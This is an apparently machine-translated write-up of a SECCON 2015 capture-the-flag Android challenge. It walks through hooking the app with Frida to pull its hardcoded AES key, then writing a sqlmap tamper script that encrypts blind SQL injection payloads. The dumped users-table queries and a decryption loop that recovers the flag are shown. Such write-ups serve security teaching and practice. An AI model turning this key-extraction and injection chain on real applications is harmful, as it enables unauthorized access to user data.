SECCON 2015 CTF Selection: A 400-point Android APK reverse question | focus on hackers and geeks

SECCON 2015 CTF Selection: A 400-point Android APK reverse question | focus on hackers and geeks

 

 

This is the second question of "Android APK reverse" in the SECCON 2015 CTF challenge, with a score of 400. The prompt is: "The key is stored in the application, but you need to hack the server ."

First, I installed the APK file to see what it can do, and found that there are only two functions: Registration and login. The name of this application is "kr. repo. h2spice. yekehtmai ".

 

APK file logon display

When using the application, I found that when I enter a single quotation mark in the "email" column, a JSON error is displayed in the message box. This indicates that the server may have the SQL injection vulnerability. Although, I soon realized that it was a blind note. In this way, typing input in this android program is too troublesome.

I set a proxy to record HTTP traffic, and the application communicates with each other through HTTP. However, the POST data parameter is encrypted in some form.

 

The next step is to decompile the APK file. I used dex2jar and loaded the JAR file in the JD-GUI to view the decompilation class. By observing the code, I found these classes seem to be confused.

Later, I saw the class "kr. repo. h2spice. yekehtmai. c", which provides an AES Encryption Algorithm in ECB mode. This class will be called during login or registration. The method "a" accepts two parameters: the POST parameter in plaintext and the key of AES.

 

AES keys are not stored in applications statically, but obfuscated by a large number of other "encoding/encryption" processes. At this moment, I am thinking about my choice: either use a debugger to inject some smali code, or I can use dynamic plug-ins. Attaching a debugger may be more troublesome: You can decompile the APK into smali by using the APKtool, re-package the APK file using the debugging information, and run the application through the IDE in the debugging mode. To inject the smali code, you also need to re-package the APK. Fortunately, Frida supports dynamic plug-ins, and you can use JavaScript to hook code on many platforms including android.

I used the following code to hook the "kr. repo. h2spice. yekehtmai. c. a" method:

Dalvik.perform(function () {    var c = Dalvik.use("kr.repo.h2spice.yekehtmai.c")    c.a.implementation = function (str1, str2) {        console.log("String1: " + str1)        console.log("String2: " + str2)    }});

Start the frida service on the Android device, run frida-Ukr. repo. h2spice. yekehtmai, and load the JavaScript hook code:

 

Now, when we log on, we can see that the encryption process is called to encrypt the parameters and record the log information in the console. I tried to use "test" as the user name and password respectively, and then successfully obtained the AES encryption key "3246847986364861" used to encrypt the POST parameter"

At this time, we can easily encrypt our POST parameters to use SQL injection. Because it is blind injection, I use SQLMap. One of its features is that you can use a data tampering script to modify parameters before they are sent to the server.

As follows:

#!/usr/bin/env python from lib.core.data import kbfrom lib.core.enums import PRIORITY import base64from Crypto.Cipher import AES BS = 16pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS) class AESCipher:    def __init__( self, key ):        self.key = key     def encrypt( self, raw ):        raw = pad(raw)        cipher = AES.new( self.key, AES.MODE_ECB)        return base64.b64encode( cipher.encrypt( raw ) ) __priority__ = PRIORITY.NORMAL def dependencies():      pass def tamper(payload, **kwargs):      retVal = payload       if payload:            retVal = AESCipher("3246847986364861").encrypt(payload)       return retVal

Now we use SQLMap for execution injection. For example, sqlmap. py-u "hxxp: // apkhost/login. php "-data =" email = xxx & password = xxx "-tamper = seccon-SQL-shell, SQLMap detects that this is a time-based blind note: however, this process will be slow. I have given a non-time-based option, which may be a good technique.

I used SQLMap dump to output the name of the current database to confirm the existence of a "users" table and enumerate the columns in the list. I started to query the first data in the "users" table, it may be an administrator account and the user "iamthekey" is found ".

> SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name="users" and table_schema="seccon2015"[*] id,unique_id,name,email,encrypted_password,salt,created_at,updated_at > SELECT name FROM users WHERE length(name)>1 ORDER BY id ASC LIMIT 1[*] iamthekey > SELECT id,unique_id,email,encrypted_password,salt FROM users where name="iamthekey" LIMIT 1  [*] 4, a159c1f7097ba80403d29e7, [email protected], MQL7ZF5Ec5uehudP0L0t//zZwykyNGYxMjgyNDAz, 24f1282403

Now, even with this information, I still don't know what to do next. Let's recall the prompt "the password exists in the application". I re-decompile the APK code. Then I noticed the "welcomeActivety" class.

 

Based on the currently used "uid" string, the application will try to decrypt the string "fuO/gyps1l1jzwet4jyau0h1_xa/ncffqy + 3fEHIn4 = ". Sure enough, we need to use the "uid" of the "iamthekey" user to decrypt it.

Now we need to figure out which substring in the "uid" string is what we need. Because the "uid" is only 23 characters long, but we need a 16-character AES key (the size of the character block is 16), we can only construct it by ourselves.

from Crypto.Cipher import AESimport base64 uid = "a159c1f7097ba80403d29e7"raw = base64.b64decode("fuO/gyps1L1JZwet4jYaU0hNvIxa/ncffqy+3fEHIn4=")for i in range(7):    print AES.new(uid[i:i+16], AES.MODE_ECB).decrypt(raw)

Then run the Python script:

$ python decrypt.py | strings SECCON{6FgshufUTpRm}

Aha, this is the flag we want! : P

* Original article address: cedricvb, which is compiled by xiaosun flower. For details, refer to FreeBuf hacker and geek (FreeBuf. COM)